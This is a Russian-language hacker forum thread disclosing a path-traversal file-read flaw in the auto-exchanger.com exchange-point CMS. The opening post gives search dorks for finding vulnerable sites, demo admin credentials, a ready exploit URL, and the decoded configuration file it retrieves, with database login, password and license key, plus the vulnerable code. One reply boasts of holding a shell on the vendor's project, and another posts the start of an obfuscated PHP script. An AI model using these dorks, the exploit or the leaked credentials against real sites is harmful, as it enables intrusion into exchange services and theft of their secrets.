auto-exchanger.com - LocalFileReader

Discussion in 'Уязвимости CMS/форумов' started by winstrool, 14 Sep 2016.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    801
    Reputations:
    841
    Сам проект по продаже CMS обменных пунктов: https://www.auto-exchanger.com
    демо проект:
    http://demo.auto-exchanger.com admin1:admin1

    DORK:
    "inurl:?lang=english exchange"
    "inurl:nview.php?title="

    експлоит:
    http://demo.auto-exchanger.com/admin/adm_template.php?id=../../configuration.php&Action=Edit

    PHP:
    <?php //0046a
    if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the <a href="http://www.ioncube.com/lw/">ionCube Loader Wizard</a> to assist with installation.');exit(199);
    ?>
    HR+cPo//f2S9/1kSBks7iYhltqWXx6IBc2Jq/CGUeTW2AXSd6dnn0KWJFT/OoPnfu6SeSmNtOct6
    fGyOtL0BJ2P/ULaZl+FMQPilWfpgS0mQjXsRxCrHQlndvGsGnokfzeekHFVlfVGALzUxTj1KZrWk
    kqRtCxv0iLjikLnjZk0j3PkJcMN59tET7LbF8DW1TPGwHFrNej37Ya+Z/Tf+VRn2OE5FtM7sNmVc
    Idt2/d734/xig87dLcYPkBCMEz4H0RBpCsqG9gKtVz9TtyfaylbSUTwuWaCdC33EplysQYTB4n8N
    LLdlPhpEE3azLNDvoC1dDPzuxAPZ5wGRv/iLwNhBE0sElp/fbNa5g2oen/suFMW7gXBTzcq2S8q+
    4QvT+88zS0kmYlQ7MRo9lsEY4+9XqMB9KDBEHfgWw6L1/+6RvE7q0Mpw1/EMDbkKfv7HxsK1Inzi
    1QPD9F8AOTMw72FveCLyAg5NvKGOpPurTG+3EDfOXlnfNV8sG6lZ4weRrDAY1rYIhsDDQi2C5+kZ
    Kvtt8kdd6pIPuiFB+1DqLcNF6H7a3e9vqruseuS78BHKEGVRE5GZ6cbseqf1ak4RqOOrzC/VQPGe
    7hSodQTWqwVersQDRwDgpS4TUEcr7hLg7Hkb5POSPwIqi64Svz3pxlUNCL1SLEi5JKfIHz77/uKe
    Z94RLSHon7b+SubIH1nFAxLcPMT98nV1mXPgIuX62E1m5J5z1iduEkszPnArKbwX9GZSXIZpdWNo
    Kku0yb7a+sDjIstt2wjBb/YRFMEiJ/x4WgqcJxw2oLgXjHOdVOmd6YFjuKxJ9IajgNE/FJfkr1nJ
    YnY6XtixJbDIFvfiT8LhsGCF6hRrfVNDHAS=
    декриптуем на сайте:
    https://idecode.eu/decoder

    PHP:
    <?php
    /**
    *
    --- IonCube v8.3.0.0 Loader By iDecode
    --- PHP 5.3
    --- Decoder version : 1.0.0.0
    --- Author     : iDecode
    --- Release on : 01.02.2015
    --- Website    : http://iDecode.eu
    *
    **/

        
    $hostname 'localhost';
        
    $database 'autoexer_demo';
        
    $db_login 'autoexer_demouse';
        
    $db_encode false;
        
    $db_pass 'rA&dPPwC492n!A';
        
    $db_prefix 'demo_';
        
    $license '7F407768525F776265507C0A521A6975027A0C25441C11';





                
    // This is the demo version. This version only decode 30 lines.
    Уязвимый участок кода в файле adm_template.php:
    Code:
    ...
    $Oid = $_GET['id'];
    ...
    if ( $_GET['Action'] == "Edit" )
    {
       $filename = realpath( $CONFIG['SKIN_FOLDER'].$Oid );
       if ( !is_writable( $filename ) )
       {
           $Error[] = $Oid." is not writable, you need to update permission if you want to edit template file from here.";
       }
       if ( !file_exists( $filename ) )
       {
           $Error[] = $Oid." is does not exist.";
       }
       if ( !$Error )
       {
           $body = file_get_contents( $filename );
       }
    }

    Вот такие безопасные бывают CMS на обменных пунктах.

    P.S: "Храните ваши деньги в сберегательных кассах!"
     
    _________________________
    #1 winstrool, 14 Sep 2016
    Last edited: 14 Sep 2016
    grimnir, crlf, Ruslan1993it and 3 others like this.
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Круасафчег
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    801
    Reputations:
    841
    еслеб не демо проект, то можно редактировать произвольные файлы!
     
    _________________________
  4. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Я давно уже хакнул его)))))
    Давно уже шелл на проекте у них мой))
     
  5. sam paypaal

    sam paypaal New Member

    Joined:
    1 Apr 2017
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    kindly decode this md5
    <?php
    $lFyE="";
    $UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m';
    $KQiR=fL1zG();